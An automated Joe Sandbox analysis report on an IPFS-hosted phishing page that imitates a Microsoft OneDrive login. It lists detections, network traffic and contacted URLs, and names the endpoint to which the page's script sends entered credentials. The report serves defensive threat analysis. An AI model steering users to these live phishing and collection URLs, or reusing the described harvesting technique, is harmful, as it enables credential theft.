Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

Overview

General Information

Sample URL:	https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/
Analysis ID:	1446163
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

AI detected suspicious javascript

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 1596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2200,i,8465809809260521268,2692650552825108474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_61	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	Avira URL Cloud: detection malicious, Label: phishing
Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

AI detected phishing page

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

LLM: Score: 8 brands: Microsoft OneDrive Reasons: The URL 'https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/' does not match the legitimate domain name for Microsoft OneDrive, which should be something like 'onedrive.live.com'. The use of IPFS (InterPlanetary File System) for hosting a OneDrive page is highly unusual and suspicious. The page mimics the appearance of a legitimate OneDrive page, which is a common social engineering technique used in phishing attacks. DOM: 0.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_61, type: DROPPED

AI detected suspicious javascript

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

LLM: Score: 8 Reasons: The JavaScript code captures form data and sends it to an external URL (https://notmark.name.ng/dell/zob.php) via an AJAX POST request. This behavior is typical of phishing attacks where user credentials or other sensitive information are harvested. Additionally, the URL used does not appear to be associated with a legitimate or well-known service, increasing the likelihood of malicious intent. DOM: 0.0.pages.csv

Phishing site detected (based on image similarity)

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	Matcher: Template: onedrive matched
Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	Matcher: Template: microsoft matched

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

HTTP Parser: Number of links: 0

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

HTTP Parser: Title: does not match URL

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/

HTTP Parser: <input type="password" .../> found

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No favicon
Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No favicon

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No <meta name="author".. found
Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No <meta name="author".. found

Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No <meta name="copyright".. found
Source: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ HTTP/1.1Host: ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ipfs.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ipfs.techConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: ipfs.io
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: cdn.glitch.global
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: logincdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: ipfs.tech

Source: chromecache_61.1.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/1.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/2.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/3.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/4.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/5.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/a.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/aa.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/b.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/c.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/d.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/e.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/f.png
Source: chromecache_61.1.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_76.1.dr, chromecache_49.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_76.1.dr, chromecache_49.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_76.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_61.1.dr	String found in binary or memory: https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
Source: chromecache_61.1.dr	String found in binary or memory: https://notmark.name.ng/dell/zob.php

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: classification engine

Classification label: mal76.phis.win@16/52@18/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2200,i,8465809809260521268,2692650552825108474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2200,i,8465809809260521268,2692650552825108474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	100%	Avira URL Cloud	phishing
https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://cdn.jsdelivr.net/npm/bootstrap	0%	URL Reputation	safe
https://getbootstrap.com/)	0%	URL Reputation	safe
https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/2.png	0%	Avira URL Cloud	safe
https://ipfs.tech/favicon.ico	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/a.png	0%	Avira URL Cloud	safe
https://github.com/twbs/bootstrap/blob/main/LICENSE)	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/5.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/f.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/c.png	0%	Avira URL Cloud	safe
https://github.com/twbs/bootstrap/graphs/contributors)	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/3.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/1.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/4.png	0%	Avira URL Cloud	safe
https://notmark.name.ng/dell/zob.php	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/d.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/e.png	0%	Avira URL Cloud	safe
https://ipfs.io/favicon.ico	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/aa.png	0%	Avira URL Cloud	safe
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/b.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		unknown
www.google.com	142.250.184.228	true	false		unknown
cs1227.wpc.alphacdn.net	192.229.221.185	true	false		unknown
ipfs.tech	169.150.247.39	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		unknown
ipfs.io	209.94.90.1	true	true		unknown
cdn.jsdelivr.net	unknown	unknown	false		unknown
logincdn.msftauth.net	unknown	unknown	false		unknown
cdn.glitch.global	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg	false	Avira URL Cloud: safe	unknown
https://ipfs.tech/favicon.ico	false	Avira URL Cloud: safe	unknown
https://ipfs.io/favicon.ico	false	Avira URL Cloud: safe	unknown
https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/5.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/a.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/f.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/graphs/contributors)	chromecache_76.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/bootstrap	chromecache_61.1.dr	false	URL Reputation: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/3.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/2.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/c.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/main/LICENSE)	chromecache_76.1.dr, chromecache_49.1.dr	false	Avira URL Cloud: safe	unknown
https://notmark.name.ng/dell/zob.php	chromecache_61.1.dr	true	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/e.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/1.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/4.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com/)	chromecache_76.1.dr, chromecache_49.1.dr	false	URL Reputation: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/d.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/aa.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown
https://cdn.glitch.global/3b26bc0d-3c39-44da-a49e-84aefc634cd2/b.png	chromecache_61.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
169.150.247.39	ipfs.tech	United States		2711	SPIRITTEL-ASUS	false
185.93.3.244	unknown	Czech Republic		60068	CDN77GB	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
192.229.221.185	cs1227.wpc.alphacdn.net	United States		15133	EDGECASTUS	false
142.250.184.228	www.google.com	United States		15169	GOOGLEUS	false
209.94.90.1	ipfs.io	United States		40680	PROTOCOLUS	true

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446163
Start date and time:	2024-05-23 00:15:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@16/52@18/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

